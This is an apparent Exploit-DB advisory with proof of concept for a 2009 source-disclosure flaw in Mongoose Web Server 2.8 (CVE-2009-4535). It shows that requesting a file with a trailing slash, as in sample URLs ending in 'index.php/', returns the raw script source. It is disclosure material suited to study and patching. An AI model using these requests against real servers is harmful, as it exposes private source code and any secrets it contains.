Mongoose Web Server 2.8 - Source Disclosure
Author: Dr_IDE
type: webapps
platform: php
port:
date_added: 2009-10-22
date_updated: 2016-09-12
verified: 1
codes: CVE-2009-4535;OSVDB-61490
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.commongoose-2.8.exe
#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: http://code.google.com/p/mongoose/
#
#######################################################
- Description -
Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.
Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.
- Technical Details -
http://[ webserver IP][:port]/[ file ][/]
http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/
#[pocoftheday.blogspot.com]